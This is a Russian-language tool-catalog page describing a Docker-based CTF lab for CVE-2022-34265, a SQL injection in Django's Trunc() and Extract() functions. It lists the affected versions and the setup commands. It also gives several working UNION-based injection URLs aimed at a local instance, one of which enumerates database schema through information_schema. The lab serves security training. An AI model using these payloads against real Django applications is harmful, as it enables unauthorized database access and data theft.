Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CTF_Django_CVE-2022-34265 — Docker-based CTF challenge, демонстрирующий SQL-инъекцию в функциях Trunc() и Extract() базы данных Django (CVE-2022-34265) с примерами UNION-полезных нагрузок. | Kitploit
Инструменты/GitHubGitHub/lnwza0x0a/ctf_django_cve-2022-34265
Анализ уязвимостейЭксплуатация веб-приложенийCTFОбучение и ОбразованиеБезопасность Баз ДанныхЛаборатории и Практика
GitHublnwza0x0a/ctf_django_cve-2022-34265

CTF_Django_CVE-2022-34265

Docker-based CTF challenge, демонстрирующий SQL-инъекцию в функциях Trunc() и Extract() базы данных Django (CVE-2022-34265) с примерами UNION-полезных нагрузок.

Репозиторий
124 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CTF_CVE-2022-34265

Описание

Проблема была обнаружена в Django 3.2 до версии 3.2.14 и в Django 4.0 до версии 4.0.6. Функции базы данных Trunc() и Extract() подвержены SQL-инъекции, если ненадёжные данные используются в качестве значения kind/lookup_name. Приложения, которые ограничивают выбор lookup_name и kind известным безопасным списком, не затронуты.

Как использовать

Запуск

root@kitploit:~
git clone https://github.com/coco0x0a/CTF_CVE-2022-34265
cd CVE-2022-34265
sudo docker-compose up -d

Проверка статуса

root@kitploit:~
sudo docker ps

Удаление

root@kitploit:~
sudo docker-compose down

Затронутые версии

  • Django>= 3.2, < 3.2.14

  • Django >= 4.0, < 4.0.6

Исправленные версии

  • Django 3.2.14

  • Django 4.0.6

Проверка

Окружение

  • Django 4.0.5
  • Python 3.8.13
  • MySQL 5.7

sql-инъекция

с использованием UNION

root@kitploit:~
http://127.0.0.1:8000/extract/?lookup_name=year%20FROM%20start_datetime))%20OR%201=1%20UNION%20SELECT%201--
http://127.0.0.1:8000/extract/?lookup_name=year FROM start_datetime)) OR 1=1 UNION SELECT 1, 2, 3, 4, 5, 6, 7--
http://127.0.0.1:8000/extract/?lookup_name=year FROM start_datetime)) OR 1=1 UNION SELECT 1, now(), now(), now(), now(), now(), now()--
http://127.0.0.1:8000/extract/?lookup_name=year FROM start_datetime)) OR 1=1 UNION SELECT "TEST", now(), now(), now(), now(), now(), now()--
http://127.0.0.1:8000/extract/?lookup_name=year FROM start_datetime)) OR 1=1 UNION SELECT CONCAT(table_name, '~', column_name), now(), now(), now(), now(), now(), now() FROM information_schema.columns--

изображение

Ссылки

https://github.com/aeyesec/CVE-2022-34265

https://github.com/ZhaoQi99/CVE-2022-34265

https://github.com/suksit/writeups/tree/main/secplayground/half-year-event-2022

Скачать инструмент